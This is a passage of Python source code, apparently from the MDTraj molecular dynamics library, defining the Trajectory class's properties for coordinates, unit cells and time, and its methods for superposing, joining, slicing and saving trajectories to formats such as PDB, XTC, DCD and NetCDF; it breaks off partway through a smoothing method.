np.ndarray, shape=(n_frames, n_atoms, 3) unitcell_vectors : {np.ndarray, shape=(n_frames, 3, 3), None} unitcell_lengths : {np.ndarray, shape=(n_frames, 3), None} unitcell_angles : {np.ndarray, shape=(n_frames, 3), None} """ # this is NOT configurable. 
if it's set to something else, things will break # (thus why I make it private) _distance_unit = 'nanometers' @property def topology(self): """Topology of the system, describing the organization of atoms into residues, bonds, etc Returns ------- topology : md.Topology The topology object, describing the organization of atoms into residues, bonds, etc """ return self._topology @topology.setter def topology(self, value): "Set the topology of the system, describing the organization of atoms into residues, bonds, etc" # todo: more typechecking self._topology = value @property def n_frames(self): """Number of frames in the trajectory Returns ------- n_frames : int The number of frames in the trajectory """ return self._xyz.shape[0] @property def n_atoms(self): """Number of atoms in the trajectory Returns ------- n_atoms : int The number of atoms in the trajectory """ return self._xyz.shape[1] @property def n_residues(self): """Number of residues (amino acids) in the trajectory Returns ------- n_residues : int The number of residues in the trajectory's topology """ if self.top is None: return 0 return sum([1 for r in self.top.residues]) @property def n_chains(self): """Number of chains in the trajectory Returns ------- n_chains : int The number of chains in the trajectory's topology """ if self.top is None: return 0 return sum([1 for c in self.top.chains]) @property def top(self): """Alias for self.topology, describing the organization of atoms into residues, bonds, etc Returns ------- topology : md.Topology The topology object, describing the organization of atoms into residues, bonds, etc """ return self._topology @top.setter def top(self, value): "Set the topology of the system, describing the organization of atoms into residues, bonds, etc" # todo: more typechecking self._topology = value @property def timestep(self): """Timestep between frames, in picoseconds Returns ------- timestep : float The timestep between frames, in picoseconds. """ if self.n_frames <= 1: raise(ValueError("Cannot calculate timestep if trajectory has one frame.")) return self._time[1] - self._time[0] @property def time(self): """The simulation time corresponding to each frame, in picoseconds Returns ------- time : np.ndarray, shape=(n_frames,) The simulation time corresponding to each frame, in picoseconds """ return self._time @time.setter def time(self, value): "Set the simulation time corresponding to each frame, in picoseconds" if isinstance(value, list): value = np.array(value) if np.isscalar(value) and self.n_frames == 1: value = np.array([value]) elif not value.shape == (self.n_frames,): raise ValueError('Wrong shape. Got %s, should be %s' % (value.shape, (self.n_frames))) self._time = value @property def unitcell_vectors(self): """The vectors that define the shape of the unit cell in each frame Returns ------- vectors : np.ndarray, shape(n_frames, 3, 3) Vectors defining the shape of the unit cell in each frame. The semantics of this array are that the shape of the unit cell in frame ``i`` are given by the three vectors, ``value[i, 0, :]``, ``value[i, 1, :]``, and ``value[i, 2, :]``. 
""" if self._unitcell_lengths is None or self._unitcell_angles is None: return None v1, v2, v3 = lengths_and_angles_to_box_vectors( self._unitcell_lengths[:, 0], # a self._unitcell_lengths[:, 1], # b self._unitcell_lengths[:, 2], # c self._unitcell_angles[:, 0], # alpha self._unitcell_angles[:, 1], # beta self._unitcell_angles[:, 2], # gamma ) return np.swapaxes(np.dstack((v1, v2, v3)), 1, 2) @unitcell_vectors.setter def unitcell_vectors(self, vectors): """Set the three vectors that define the shape of the unit cell Parameters ---------- vectors : tuple of three arrays, each of shape=(n_frames, 3) The semantics of this array are that the shape of the unit cell in frame ``i`` are given by the three vectors, ``value[i, 0, :]``, ``value[i, 1, :]``, and ``value[i, 2, :]``. """ if vectors is None or np.all(np.abs(vectors) < 1e-15): self._unitcell_lengths = None self._unitcell_angles = None return if not len(vectors) == len(self): raise TypeError('unitcell_vectors must be the same length as ' 'the trajectory. you provided %s' % str(vectors)) v1 = vectors[:, 0, :] v2 = vectors[:, 1, :] v3 = vectors[:, 2, :] a, b, c, alpha, beta, gamma = box_vectors_to_lengths_and_angles(v1, v2, v3) self._unitcell_lengths = np.vstack((a, b, c)).T self._unitcell_angles = np.vstack((alpha, beta, gamma)).T @property def unitcell_volumes(self): """Volumes of unit cell for each frame. Returns ------- volumes : {np.ndarray, shape=(n_frames), None} Volumes of the unit cell in each frame, in nanometers^3, or None if the Trajectory contains no unitcell information. """ if self.unitcell_lengths is not None: return np.array(list(map(np.linalg.det, self.unitcell_vectors))) else: return None @property def unitcell_lengths(self): """Lengths that define the shape of the unit cell in each frame. Returns ------- lengths : {np.ndarray, shape=(n_frames, 3), None} Lengths of the unit cell in each frame, in nanometers, or None if the Trajectory contains no unitcell information. """ return self._unitcell_lengths @property def unitcell_angles(self): """Angles that define the shape of the unit cell in each frame. Returns ------- lengths : np.ndarray, shape=(n_frames, 3) The angles between the three unitcell vectors in each frame, ``alpha``, ``beta``, and ``gamma``. ``alpha' gives the angle between vectors ``b`` and ``c``, ``beta`` gives the angle between vectors ``c`` and ``a``, and ``gamma`` gives the angle between vectors ``a`` and ``b``. The angles are in degrees. """ return self._unitcell_angles @unitcell_lengths.setter def unitcell_lengths(self, value): """Set the lengths that define the shape of the unit cell in each frame Parameters ---------- value : np.ndarray, shape=(n_frames, 3) The distances ``a``, ``b``, and ``c`` that define the shape of the unit cell in each frame, or None """ self._unitcell_lengths = ensure_type(value, np.float32, 2, 'unitcell_lengths', can_be_none=True, shape=(len(self), 3), warn_on_cast=False, add_newaxis_on_deficient_ndim=True) @unitcell_angles.setter def unitcell_angles(self, value): """Set the lengths that define the shape of the unit cell in each frame Parameters ---------- value : np.ndarray, shape=(n_frames, 3) The angles ``alpha``, ``beta`` and ``gamma`` that define the shape of the unit cell in each frame. The angles should be in degrees. 
""" self._unitcell_angles = ensure_type(value, np.float32, 2, 'unitcell_angles', can_be_none=True, shape=(len(self), 3), warn_on_cast=False, add_newaxis_on_deficient_ndim=True) @property def xyz(self): """Cartesian coordinates of each atom in each simulation frame Returns ------- xyz : np.ndarray, shape=(n_frames, n_atoms, 3) A three dimensional numpy array, with the cartesian coordinates of each atoms in each frame. """ return self._xyz @xyz.setter def xyz(self, value): "Set the cartesian coordinates of each atom in each simulation frame" if self.top is not None: # if we have a topology and its not None shape = (None, self.topology._numAtoms, 3) else: shape = (None, None, 3) value = ensure_type(value, np.float32, 3, 'xyz', shape=shape, warn_on_cast=False, add_newaxis_on_deficient_ndim=True) self._xyz = value self._rmsd_traces = None def _string_summary_basic(self): """Basic summary of traj in string form.""" unitcell_str = 'and unitcells' if self._have_unitcell else 'without unitcells' value = "mdtraj.Trajectory with %d frames, %d atoms, %d residues, %s" % ( self.n_frames, self.n_atoms, self.n_residues, unitcell_str) return value def __len__(self): return self.n_frames def __add__(self, other): "Concatenate two trajectories" return self.join(other) def __str__(self): return "<%s>" % (self._string_summary_basic()) def __repr__(self): return "<%s at 0x%02x>" % (self._string_summary_basic(), id(self)) def __hash__(self): hash_value = hash(self.top) # combine with hashes of arrays hash_value ^= _hash_numpy_array(self._xyz) hash_value ^= _hash_numpy_array(self.time) hash_value ^= _hash_numpy_array(self._unitcell_lengths) hash_value ^= _hash_numpy_array(self._unitcell_angles) return hash_value def __eq__(self, other): return self.__hash__() == other.__hash__() # def describe(self): # """Diagnostic summary statistics on the trajectory""" # # What information do we want to display? # # Goals: easy to figure out if a trajectory is blowing up or contains # # bad data, easy to diagonose other problems. Generally give a # # high-level description of the data in the trajectory. # # Possibly show std. dev. of differnt coordinates in the trajectory # # or maybe its RMSD drift or something? # # Also, check for any NaNs or Infs in the data. Or other common issues # # like that? # # Note that pandas.DataFrame has a describe() method, which gives # # min/max/mean/std.dev./percentiles of each column in a DataFrame. # raise NotImplementedError() def superpose(self, reference, frame=0, atom_indices=None, ref_atom_indices=None, parallel=True): """Superpose each conformation in this trajectory upon a reference Parameters ---------- reference : md.Trajectory Align self to a particular frame in `reference` frame : int The index of the conformation in `reference` to align to. atom_indices : array_like, or None The indices of the atoms to superpose. If not supplied, all atoms will be used. ref_atom_indices : array_like, or None Use these atoms on the reference structure. If not supplied, the same atom indices will be used for this trajectory and the reference one. 
parallel : bool Use OpenMP to run the superposition in parallel over multiple cores Returns ------- self """ if atom_indices is None: atom_indices = slice(None) if ref_atom_indices is None: ref_atom_indices = atom_indices if not isinstance(ref_atom_indices, slice) and ( len(ref_atom_indices) != len(atom_indices)): raise ValueError("Number of atoms must be consistent!") n_frames = self.xyz.shape[0] self_align_xyz = np.asarray(self.xyz[:, atom_indices, :], order='c') self_displace_xyz = np.asarray(self.xyz, order='c') ref_align_xyz = np.array(reference.xyz[frame, ref_atom_indices, :], copy=True, order='c').reshape(1, -1, 3) offset = np.mean(self_align_xyz, axis=1, dtype=np.float64).reshape(n_frames, 1, 3) self_align_xyz -= offset if self_align_xyz.ctypes.data != self_displace_xyz.ctypes.data: # when atom_indices is None, these two arrays alias the same memory # so we only need to do the centering once self_displace_xyz -= offset ref_offset = ref_align_xyz[0].astype('float64').mean(0) ref_align_xyz[0] -= ref_offset self_g = np.einsum('ijk,ijk->i', self_align_xyz, self_align_xyz) ref_g = np.einsum('ijk,ijk->i', ref_align_xyz , ref_align_xyz) _rmsd.superpose_atom_major( ref_align_xyz, self_align_xyz, ref_g, self_g, self_displace_xyz, 0, parallel=parallel) self_displace_xyz += ref_offset self.xyz = self_displace_xyz return self def join(self, other, check_topology=True, discard_overlapping_frames=False): """Join two trajectories together along the time/frame axis. This method joins trajectories along the time axis, giving a new trajectory of length equal to the sum of the lengths of `self` and `other`. It can also be called by using `self + other` Parameters ---------- other : Trajectory or list of Trajectory One or more trajectories to join with this one. These trajectories are *appended* to the end of this trajectory. check_topology : bool Ensure that the topology of `self` and `other` are identical before joining them. If false, the resulting trajectory will have the topology of `self`. discard_overlapping_frames : bool, optional If True, compare coordinates at trajectory edges to discard overlapping frames. Default: False. See Also -------- stack : join two trajectories along the atom axis """ if isinstance(other, Trajectory): other = [other] if isinstance(other, list): if not all(isinstance(o, Trajectory) for o in other): raise TypeError('You can only join Trajectory instances') if not all(self.n_atoms == o.n_atoms for o in other): raise ValueError('Number of atoms in self (%d) is not equal ' 'to number of atoms in other' % (self.n_atoms)) if check_topology and not all(self.topology == o.topology for o in other): raise ValueError('The topologies of the Trajectories are not the same') if not all(self._have_unitcell == o._have_unitcell for o in other): raise ValueError('Mixing trajectories with and without unitcell') else: raise TypeError('`other` must be a list of Trajectory. 
You supplied %s' % type(other)) # list containing all of the trajs to merge, including self trajectories = [self] + other if discard_overlapping_frames: for i in range(len(trajectories)-1): # last frame of trajectory i x0 = trajectories[i].xyz[-1] # first frame of trajectory i+1 x1 = trajectories[i + 1].xyz[0] # check that all atoms are within 2e-3 nm # (this is kind of arbitrary) if np.all(np.abs(x1 - x0) < 2e-3): trajectories[i] = trajectories[i][:-1] xyz = np.concatenate([t.xyz for t in trajectories]) time = np.concatenate([t.time for t in trajectories]) angles = lengths = None if self._have_unitcell: angles = np.concatenate([t.unitcell_angles for t in trajectories]) lengths = np.concatenate([t.unitcell_lengths for t in trajectories]) # use this syntax so that if you subclass Trajectory, # the subclass's join() will return an instance of the subclass return self.__class__(xyz, deepcopy(self._topology), time=time, unitcell_lengths=lengths, unitcell_angles=angles) def stack(self, other): """Stack two trajectories along the atom axis This method joins trajectories along the atom axis, giving a new trajectory with a number of atoms equal to the sum of the number of atoms in `self` and `other`. Notes ----- The resulting trajectory will have the unitcell and time information of the left operand. Examples -------- >>> t1 = md.load('traj1.h5') >>> t2 = md.load('traj2.h5') >>> # even when t2 contains no unitcell information >>> t2.unitcell_vectors = None >>> stacked = t1.stack(t2) >>> # the stacked trajectory inherits the unitcell information >>> # from the first trajectory >>> np.all(stacked.unitcell_vectors == t1.unitcell_vectors) True Parameters ---------- other : Trajectory The other trajectory to join See Also -------- join : join two trajectories along the time/frame axis. """ if not isinstance(other, Trajectory): raise TypeError('You can only stack two Trajectory instances') if self.n_frames != other.n_frames: raise ValueError('Number of frames in self (%d) is not equal ' 'to number of frames in other (%d)' % (self.n_frames, other.n_frames)) if self.topology is not None: topology = self.topology.join(other.topology) else: topology = None xyz = np.hstack((self.xyz, other.xyz)) return self.__class__(xyz=xyz, topology=topology, unitcell_angles=self.unitcell_angles, unitcell_lengths=self.unitcell_lengths, time=self.time) def __getitem__(self, key): "Get a slice of this trajectory" return self.slice(key) def slice(self, key, copy=True): """Slice trajectory, by extracting one or more frames into a separate object This method can also be called using index bracket notation, i.e `traj[1] == traj.slice(1)` Parameters ---------- key : {int, np.ndarray, slice} The slice to take. Can be either an int, a list of ints, or a slice object. copy : bool, default=True Copy the arrays after slicing. If you set this to false, then if you modify a slice, you'll modify the original array since they point to the same data. 
""" xyz = self.xyz[key] time = self.time[key] unitcell_lengths, unitcell_angles = None, None if self.unitcell_angles is not None: unitcell_angles = self.unitcell_angles[key] if self.unitcell_lengths is not None: unitcell_lengths = self.unitcell_lengths[key] if copy: xyz = xyz.copy() time = time.copy() topology = deepcopy(self._topology) if self.unitcell_angles is not None: unitcell_angles = unitcell_angles.copy() if self.unitcell_lengths is not None: unitcell_lengths = unitcell_lengths.copy() else: topology = self._topology newtraj = self.__class__( xyz, topology, time, unitcell_lengths=unitcell_lengths, unitcell_angles=unitcell_angles) if self._rmsd_traces is not None: newtraj._rmsd_traces = np.array(self._rmsd_traces[key], ndmin=1, copy=True) return newtraj def __init__(self, xyz, topology, time=None, unitcell_lengths=None, unitcell_angles=None): # install the topology into the object first, so that when setting # the xyz, we can check that it lines up (e.g. n_atoms), with the topology self.topology = topology self.xyz = xyz # _rmsd_traces are the inner product of each centered conformation, # which are required for computing RMSD. Normally these values are # calculated on the fly in the cython code (rmsd/_rmsd.pyx), but # optionally, we enable the use precomputed values which can speed # up the calculation (useful for clustering), but potentially be unsafe # if self._xyz is modified without a corresponding change to # self._rmsd_traces. This array is populated computed by # center_conformations, and no other methods should really touch it. self._rmsd_traces = None # box has no default, it'll just be none normally self.unitcell_lengths = unitcell_lengths self.unitcell_angles = unitcell_angles # time will take the default 1..N self._time_default_to_arange = (time is None) if time is None: time = np.arange(len(self.xyz)) self.time = time if (topology is not None) and (topology._numAtoms != self.n_atoms): raise ValueError("Number of atoms in xyz (%s) and " "in topology (%s) don't match" % (self.n_atoms, topology._numAtoms)) def openmm_positions(self, frame): """OpenMM-compatable positions of a single frame. Examples -------- >>> t = md.load('trajectory.h5') >>> context.setPositions(t.openmm_positions(0)) Parameters ---------- frame : int The index of frame of the trajectory that you wish to extract Returns ------- positions : list The cartesian coordinates of specific trajectory frame, formatted for input to OpenMM """ from simtk.openmm import Vec3 from simtk.unit import nanometer Pos = [] for xyzi in self.xyz[frame]: Pos.append(Vec3(xyzi[0], xyzi[1], xyzi[2])) return Pos * nanometer def openmm_boxes(self, frame): """OpenMM-compatable box vectors of a single frame. Examples -------- >>> t = md.load('trajectory.h5') >>> context.setPeriodicBoxVectors(t.openmm_positions(0)) Parameters ---------- frame : int Return box for this single frame. Returns ------- box : tuple The periodic box vectors for this frame, formatted for input to OpenMM. """ from simtk.openmm import Vec3 from simtk.unit import nanometer vectors = self.unitcell_vectors[frame] if vectors is None: raise ValueError("this trajectory does not contain box size information") v1, v2, v3 = vectors return (Vec3(*v1), Vec3(*v2), Vec3(*v3)) * nanometer @staticmethod # im not really sure if the load function should be just a function or a method on the class # so effectively, lets make it both? 
def load(filenames, **kwargs): """Load a trajectory from disk Parameters ---------- filenames : {str, [str]} Either a string or list of strings Other Parameters ---------------- As requested by the various load functions -- it depends on the extension """ return load(filenames, **kwargs) def _savers(self): """Return a dictionary mapping extensions to the appropriate format-specific save function""" return {'.xtc': self.save_xtc, '.trr': self.save_trr, '.pdb': self.save_pdb, '.pdb.gz': self.save_pdb, '.dcd': self.save_dcd, '.h5': self.save_hdf5, '.binpos': self.save_binpos, '.nc': self.save_netcdf, '.netcdf': self.save_netcdf, '.ncrst' : self.save_netcdfrst, '.crd': self.save_mdcrd, '.mdcrd': self.save_mdcrd, '.ncdf': self.save_netcdf, '.lh5': self.save_lh5, '.lammpstrj': self.save_lammpstrj, '.xyz': self.save_xyz, '.xyz.gz': self.save_xyz, '.gro': self.save_gro, '.rst7' : self.save_amberrst7, } def save(self, filename, **kwargs): """Save trajectory to disk, in a format determined by the filename extension Parameters ---------- filename : str filesystem path in which to save the trajectory. The extension will be parsed and will control the format. Other Parameters ---------------- lossy : bool For .h5 or .lh5, whether or not to use compression. no_models: bool For .pdb. TODO: Document this? force_overwrite : bool If `filename` already exists, overwrite it. """ # grab the extension of the filename extension = _get_extension(filename) savers = self._savers() try: saver = savers[extension] except KeyError: raise IOError('Sorry, no saver for filename=%s (extension=%s) ' 'was found. I can only save files ' 'with extensions in %s' % (filename, extension, savers.keys())) # run the saver, and return whatever output it gives return saver(filename, **kwargs) def save_hdf5(self, filename, force_overwrite=True): """Save trajectory to MDTraj HDF5 format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with HDF5TrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(coordinates=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), time=self.time, cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) f.topology = self.topology def save_lammpstrj(self, filename, force_overwrite=True): """Save trajectory to LAMMPS custom dump format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with LAMMPSTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) def save_xyz(self, filename, force_overwrite=True): """Save trajectory to .xyz format. 
Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with XYZTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), types=[a.name for a in self.top.atoms]) def save_pdb(self, filename, force_overwrite=True, bfactors=None): """Save trajectory to RCSB PDB format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there bfactors : array_like, default=None, shape=(n_frames, n_atoms) or (n_atoms,) Save bfactors with pdb file. If the array is two dimensional it should contain a bfactor for each atom in each frame of the trajectory. Otherwise, the same bfactor will be saved in each frame. """ self._check_valid_unitcell() if not bfactors is None: if len(np.array(bfactors).shape) == 1: if len(bfactors) != self.n_atoms: raise ValueError("bfactors %s should be shaped as (n_frames, n_atoms) or (n_atoms,)" % str(np.array(bfactors).shape)) bfactors = [bfactors] * self.n_frames else: if np.array(bfactors).shape != (self.n_frames, self.n_atoms): raise ValueError("bfactors %s should be shaped as (n_frames, n_atoms) or (n_atoms,)" % str(np.array(bfactors).shape)) else: bfactors = [None] * self.n_frames with PDBTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: for i in xrange(self.n_frames): if self._have_unitcell: f.write(in_units_of(self._xyz[i], Trajectory._distance_unit, f.distance_unit), self.topology, modelIndex=i, bfactors=bfactors[i], unitcell_lengths=in_units_of(self.unitcell_lengths[i], Trajectory._distance_unit, f.distance_unit), unitcell_angles=self.unitcell_angles[i]) else: f.write(in_units_of(self._xyz[i], Trajectory._distance_unit, f.distance_unit), self.topology, modelIndex=i, bfactors=bfactors[i]) def save_xtc(self, filename, force_overwrite=True): """Save trajectory to Gromacs XTC format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with XTCTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), time=self.time, box=in_units_of(self.unitcell_vectors, Trajectory._distance_unit, f.distance_unit)) def save_trr(self, filename, force_overwrite=True): """Save trajectory to Gromacs TRR format Notes ----- Only the xyz coordinates and the time are saved, the velocities and forces in the trr will be zeros Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with TRRTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), time=self.time, box=in_units_of(self.unitcell_vectors, Trajectory._distance_unit, f.distance_unit)) def save_dcd(self, filename, force_overwrite=True): """Save trajectory to CHARMM/NAMD DCD format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filenames, if its already there """ self._check_valid_unitcell() with DCDTrajectoryFile(filename, 'w', 
force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) def save_dtr(self, filename, force_overwrite=True): """Save trajectory to DESMOND DTR format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filenames, if its already there """ self._check_valid_unitcell() with DTRTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles, times=self.time) def save_binpos(self, filename, force_overwrite=True): """Save trajectory to AMBER BINPOS format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ with BINPOSTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit)) def save_mdcrd(self, filename, force_overwrite=True): """Save trajectory to AMBER mdcrd format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if its already there """ self._check_valid_unitcell() if self._have_unitcell: if not np.all(self.unitcell_angles == 90): raise ValueError('Only rectilinear boxes can be saved to mdcrd files. ' 'Your angles are {}'.format(self.unitcell_angles)) with MDCRDTrajectoryFile(filename, mode='w', force_overwrite=force_overwrite) as f: f.write(xyz=in_units_of(self.xyz, Trajectory._distance_unit, f.distance_unit), cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit)) def save_netcdf(self, filename, force_overwrite=True): """Save trajectory in AMBER NetCDF format Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there """ self._check_valid_unitcell() with NetCDFTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(coordinates=in_units_of(self._xyz, Trajectory._distance_unit, NetCDFTrajectoryFile.distance_unit), time=self.time, cell_lengths=in_units_of(self.unitcell_lengths, Trajectory._distance_unit, f.distance_unit), cell_angles=self.unitcell_angles) def save_netcdfrst(self, filename, force_overwrite=True): """Save trajectory in AMBER NetCDF restart format Parameters ---------- filename : str filesystem path in which to save the restart force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there Notes ----- NetCDF restart files can only store a single frame. If only one frame exists, "filename" will be written. 
Otherwise, "filename.#" will be written, where # is a zero-padded number from 1 to the total number of frames in the trajectory """ self._check_valid_unitcell() if self.n_frames == 1: with AmberNetCDFRestartFile(filename, 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) f.write(coordinates=coordinates, time=self.time[0], cell_lengths=lengths, cell_angles=self.unitcell_angles) else: fmt = '%s.%%0%dd' % (filename, len(str(self.n_frames))) for i in xrange(self.n_frames): with AmberNetCDFRestartFile(fmt % (i+1), 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberNetCDFRestartFile.distance_unit) f.write(coordinates=coordinates[i], time=self.time[i], cell_lengths=lengths[i], cell_angles=self.unitcell_angles[i]) def save_amberrst7(self, filename, force_overwrite=True): """Save trajectory in AMBER ASCII restart format Parameters ---------- filename : str filesystem path in which to save the restart force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there Notes ----- Amber restart files can only store a single frame. If only one frame exists, "filename" will be written. Otherwise, "filename.#" will be written, where # is a zero-padded number from 1 to the total number of frames in the trajectory """ self._check_valid_unitcell() if self.n_frames == 1: with AmberRestartFile(filename, 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberRestartFile.distance_unit) f.write(coordinates=coordinates, time=self.time[0], cell_lengths=lengths, cell_angles=self.unitcell_angles) else: fmt = '%s.%%0%dd' % (filename, len(str(self.n_frames))) for i in xrange(self.n_frames): with AmberRestartFile(fmt % (i+1), 'w', force_overwrite=force_overwrite) as f: coordinates = in_units_of(self._xyz, Trajectory._distance_unit, AmberRestartFile.distance_unit) lengths = in_units_of(self.unitcell_lengths, Trajectory._distance_unit, AmberRestartFile.distance_unit) f.write(coordinates=coordinates[i], time=self.time[0], cell_lengths=lengths[i], cell_angles=self.unitcell_angles[i]) def save_lh5(self, filename, force_overwrite=True): """Save trajectory in deprecated MSMBuilder2 LH5 (lossy HDF5) format. 
Parameters ---------- filename : str filesystem path in which to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at filename, if it's already there """ with LH5TrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(coordinates=self.xyz) f.topology = self.topology def save_gro(self, filename, force_overwrite=True, precision=3): """Save trajectory in Gromacs .gro format Parameters ---------- filename : str Path to save the trajectory force_overwrite : bool, default=True Overwrite anything that exists at that filename if it exists precision : int, default=3 The number of decimal places to use for coordinates in GRO file """ self._check_valid_unitcell() with GroTrajectoryFile(filename, 'w', force_overwrite=force_overwrite) as f: f.write(self.xyz, self.topology, self.time, self.unitcell_vectors, precision=precision) def center_coordinates(self, mass_weighted=False): """Center each trajectory frame at the origin (0,0,0). This method acts inplace on the trajectory. The centering can be either uniformly weighted (mass_weighted=False) or weighted by the mass of each atom (mass_weighted=True). Parameters ---------- mass_weighted : bool, optional (default = False) If True, weight atoms by mass when removing COM. Returns ------- self """ if mass_weighted and self.top is not None: self.xyz -= distance.compute_center_of_mass(self)[:, np.newaxis, :] else: self._rmsd_traces = _rmsd._center_inplace_atom_major(self._xyz) return self @deprecated('restrict_atoms was replaced by atom_slice and will be removed in 2.0') def restrict_atoms(self, atom_indices, inplace=True): """Retain only a subset of the atoms in a trajectory Deletes atoms not in `atom_indices`, and re-indexes those that remain Parameters ---------- atom_indices : array-like, dtype=int, shape=(n_atoms) List of atom indices to keep. inplace : bool, default=True If ``True``, the operation is done inplace, modifying ``self``. Otherwise, a copy is returned with the restricted atoms, and ``self`` is not modified. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. """ return self.atom_slice(atom_indices, inplace=inplace) def atom_slice(self, atom_indices, inplace=False): """Create a new trajectory from a subset of atoms Parameters ---------- atom_indices : array-like, dtype=int, shape=(n_atoms) List of indices of atoms to retain in the new trajectory. inplace : bool, default=False If ``True``, the operation is done inplace, modifying ``self``. Otherwise, a copy is returned with the sliced atoms, and ``self`` is not modified. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. 
See Also -------- stack : stack multiple trajectories along the atom axis """ xyz = np.array(self.xyz[:, atom_indices], order='C') topology = None if self._topology is not None: topology = self._topology.subset(atom_indices) if inplace: if self._topology is not None: self._topology = topology self._xyz = xyz return self unitcell_lengths = unitcell_angles = None if self._have_unitcell: unitcell_lengths = self._unitcell_lengths.copy() unitcell_angles = self._unitcell_angles.copy() time = self._time.copy() return Trajectory(xyz=xyz, topology=topology, time=time, unitcell_lengths=unitcell_lengths, unitcell_angles=unitcell_angles) def remove_solvent(self, exclude=None, inplace=False): """ Create a new trajectory without solvent atoms Parameters ---------- exclude : array-like, dtype=str, shape=(n_solvent_types) List of solvent residue names to retain in the new trajectory. inplace : bool, default=False If ``True``, the operation is done inplace, modifying ``self``. Otherwise, a copy is returned, and ``self`` is not modified. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new trajectory, depending on the value of ``inplace``. """ solvent_types = list(_SOLVENT_TYPES) if exclude is not None: if isinstance(exclude, str): raise TypeError('exclude must be array-like') if not isinstance(exclude, Iterable): raise TypeError('exclude is not iterable') for type in exclude: if type not in solvent_types: raise ValueError(type + ' is not a valid solvent type') solvent_types.remove(type) atom_indices = [atom.index for atom in self.topology.atoms if atom.residue.name not in solvent_types] return self.atom_slice(atom_indices, inplace = inplace) def smooth(self, width, order=3, atom_indices=None, inplace=False): """Smoothen a trajectory using a zero-delay Butterworth filter. Please note that for optimal results the trajectory should be properly aligned prior to smoothing (see `md.Trajectory.superpose`). Parameters ---------- width : int This acts very similarly to the window size in a moving average smoother. In this implementation, the frequency of the low-pass filter is taken to be two over this width, so it's like "half the period" of the sinusoid where the filter starts to kick in. Must be an integer greater than one. order : int, optional, default=3 The order of the filter. A small odd number is recommended. Higher order filters cut off more quickly, but have worse numerical properties. atom_indices : array-like, dtype=int, shape=(n_atoms), default=None List of indices of the atoms to smooth. Default is set to `None`, which applies smoothing to all atoms. inplace : bool, default=False If ``True``, the operation is done inplace, modifying ``self``. Otherwise, a copy is returned, and ``self`` is not modified. Returns ------- traj : md.Trajectory The return value is either ``self``, or the new smoothed trajectory, depending on the value of ``inplace``. References ---------- .. [1] "FiltFilt". Scipy Cookbook. SciPy. <http://www.scipy.org/Cookbook/FiltFilt>. """ from scipy.signal import lfilter, lfilter_zi, filtfilt, butter if width < 2.0 or not isinstance(width, int): raise ValueError('width must be an integer greater than 1.') if atom_indices is None: atom_indices = range(self.n_atoms) # find nearest odd integer pad = int(np.ceil((width + 1)/2)*2 - 1) # Use 